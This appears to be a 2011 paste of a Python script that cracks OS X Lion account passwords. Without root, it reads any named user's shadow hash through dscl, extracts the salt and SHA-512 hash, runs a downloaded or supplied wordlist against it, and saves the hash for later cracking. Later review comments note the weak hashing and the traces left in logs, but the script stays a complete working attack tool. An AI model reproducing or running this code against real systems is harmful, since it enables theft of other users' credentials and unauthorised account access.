
OS X Lion Password Cracker

By: defenceindepth on Sep 18th, 2011  |  syntax: Python  |  size: 2.89 KB  |  views: 22,749  |  expires: Never
  1. ##########################################
  2. #* OS X Lion 10.7 Password Cracker
  3. #* UID 0 NOT required
  4. #*
  5. #* Usage:
  6. #* python lion_crack.py [username] [dictionary]
  7. #*
  8. #*
  9. #* Patrick Dunstan
  10. #* Sep 18, 2011
  11. #* http://www.defenceindepth.net
  12. #*
  13. ###########################################
  14. from subprocess import *
  15. import hashlib
  16. import os
  17. import urllib2
  18. import sys
  19. from string import *
  20.  
  # Module-level defaults for this Python 2 script.
  # `link` is the wordlist that is downloaded when no dictionary file is passed
  # on the command line.
  # NOTE(review): the URL is plain http://, so the download has no transport
  # integrity, and the request itself is visible on the network.
  username = ""        # target account; set from argv[1] or from `whoami` later
  defaultuser = False  # becomes True when no username argument was supplied
  link = "http://nmap.org/svn/nselib/data/passwords.lst" # Online password file
  24.  
  def check(password): # Hash password and compare
      """Hash one candidate with the account salt and compare it to the stored hash.

      Reads the module globals ``salt_hex``, ``hash`` and ``username`` that the
      script body sets before the first call. Candidates starting with "#!" are
      skipped (comment lines in the wordlist). On a match the cleartext is
      printed and the process exits with status 0; otherwise nothing is returned.

      Defender notes:
      - The comparison is one SHA-512 pass over salt + password with a 4-byte
        salt. A single fast hash offers little resistance to offline guessing,
        which is why iterated, deliberately slow KDFs are preferred for stored
        passwords.
      - Every candidate, and the recovered password, is written to stdout, so
        they end up in terminal scrollback or any captured output.
      """
      if password.startswith("#!"): # Ignore comments
          return

      candidate_digest = hashlib.sha512(salt_hex + password).hexdigest()
      print("Trying... " + password)

      if candidate_digest != hash:
          return

      print("Cleartext password for user '"+username+"' is : "+password)
      exit(0)
  35.  
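  # Pick the target account: argv[1] when given, otherwise the invoking user.
  if len(sys.argv) < 2:
      print("No username given. Defaulting to current user.")
      defaultuser = True
  else:
      username = sys.argv[1]

  # Commands are passed as argument lists instead of shell strings: the
  # username comes straight from argv, and concatenating it into a
  # shell=True command line would let shell metacharacters in it run as
  # additional commands.
  p = Popen(["whoami"], stdout=PIPE)
  whoami = p.communicate()[0]

  if defaultuser:
      username = whoami.rstrip()

  # Defender note: the account record is read through Directory Services as
  # the invoking user (the header states UID 0 is not required). The
  # ShadowHashData attribute in this output is what the rest of the script
  # parses. Process-execution logs showing `dscl ... -read /Search/Users/<name>`
  # from non-admin sessions are the observable trace of this step.
  p = Popen(["dscl", "localhost", "-read", "/Search/Users/" + username], stdout=PIPE)
  dscl_out = p.communicate()[0]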
  50.  
  dscl_lines = dscl_out.split("\n")

  # The hex blob is taken from the line that follows the attribute name, with
  # the spaces between hex groups removed. If the attribute appears more than
  # once, the last occurrence wins.
  # NOTE(review): `digest` stays unbound when the attribute is absent from the
  # dscl output, so the len() call below would raise NameError in that case.
  for pos, item in enumerate(dscl_lines): # extract digest
      if "dsAttrTypeNative:ShadowHashData" in item:
          digest = dscl_lines[pos+1].replace(" ", "")

  # Blob length (hex characters) -> (salt start, salt end, hash start, hash end).
  # The salt is 8 hex characters and the hash 128 hex characters in every layout.
  # NOTE(review): in the 1436 entry the salt and hash slices start at the same
  # offset, unlike the other three layouts; this looks inconsistent, confirm.
  layouts = {
      262: (56, 64, 64, 192),       # Out of box configuration
      314: (104, 112, 112, 240),    # SMB turned on
      1436: (176, 184, 176, 304),   # Lion Server
      1492: (224, 232, 232, 360),   # Lion Server with SMB
  }

  digest_len = len(digest)
  if digest_len == 314:
      print("SMB is on")

  # An unrecognised length leaves `salt` and `hash` undefined, as before.
  if digest_len in layouts:
      salt_from, salt_to, hash_from, hash_to = layouts[digest_len]
      salt = digest[salt_from:salt_to]
      hash = digest[hash_from:hash_to]
  70.  
  # Echo the extracted values (hex strings) to stdout.
  print("SALT : " + salt)
  print("HASH : " + hash)

  # Despite its name, salt_hex holds the decoded salt: the 8 hex characters
  # are turned into 4 raw characters (a Python 2 byte string) so they can be
  # prepended to each candidate before hashing.
  salt_hex = "".join(chr(int(salt[i:i + 2], 16)) for i in (0, 2, 4, 6))
  75.  
  # The invoking user's own login name is always tried as a candidate too.
  own_name = whoami.rstrip()

  if len(sys.argv) == 3: # If dictionary file specified
      dict_path = sys.argv[2]
      print("Reading from dictionary file '"+dict_path+"'.")
      check(own_name)

      # Feed the file to check() line by line, stripping trailing whitespace.
      # readline() returns "" only at end of file, which ends the iteration.
      passlist = open(dict_path, "r")
      for password in iter(passlist.readline, ""):
          check(password.rstrip())
      passlist.close()

  else: # No dictionary file specified
      print("No dictionary file specified. Defaulting to hard coded link.")

      # NOTE(review): fetched over plain HTTP with no integrity check; the
      # entries are split on "\n" and passed to check() without rstrip().
      passlist = urllib2.urlopen(link) # Download dictionary file
      passwords = passlist.read().split("\n")
      print("\nPassword list successfully read")

      passwords.append(own_name)

      print("\nCracking...")
      for password in passwords:
          check(password)
  99.  
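  # Save hash for later
  # Reached only when no candidate matched; check() exits the process on a hit.
  # The file holds password-equivalent material, so it is created owner-only
  # (0600) instead of with the default umask-derived mode. It is closed even if
  # the write fails.
  # NOTE(review): `username` comes from argv and is used in the path unchanged,
  # so the file is written wherever that value points relative to the cwd.
  print("\nSaving hash to "+username+".hash...")
  fd = os.open(username+".hash", os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
  out = os.fdopen(fd, "w")
  try:
      os.fchmod(fd, 0o600)  # the mode passed to os.open() is ignored for an existing file
      out.write(salt+hash)
  finally:
      out.close()

  print("\nPassword not found. Try another dictionary.\n")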